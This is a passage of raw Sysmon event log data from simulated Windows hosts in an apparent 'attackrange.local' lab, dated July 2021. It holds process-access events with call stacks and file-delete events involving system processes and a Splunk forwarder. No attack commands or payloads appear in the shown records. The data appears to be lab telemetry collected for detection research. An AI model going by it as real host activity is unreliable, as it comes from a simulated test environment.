07:51:45.537{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+2c4f|c:\windows\system32\appinfo.dll+4026|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.484{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.484{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.469{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.469{466BC892-32D3-60E8-770B-00000000CF01}63567764C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.469{466BC892-32D3-60E8-770B-00000000CF01}63567764C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.469{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.453{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.453{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70767116C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+36f20|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+32f80|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+22534|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\SharedStartModel.dll+77f37|C:\Windows\System32\SharedStartModel.dll+b2d9d|C:\Windows\System32\SharedStartModel.dll+b2285|C:\Windows\System32\SharedStartModel.dll+b2801|C:\Windows\system32\windows.cortana.Desktop.dll+a80e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f 10341000x80000000000000001048536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.437{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x80000000000000001048528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.069{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=BBAFBB5881A4D5943999BDA500745591,SHA256=2586CE4AC1315DD80188A5F0C92C8D447D1E6B11FBCACD584EDCEF4963DB170D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.955{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25F7B7EEB6BF6980EBAB441BBCE411D8,SHA256=8140E0D1B06C0BF6B4701A3F92761658DF9036C0C78F7D2849B5B5E3633B0686,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:46.212{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E853D4BF1196A57186E8DB4BE5F5DCD,SHA256=8A6E31A0754F1711EACCABD0CE9AFB0470E00DE615034451911933D26AF2F793,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 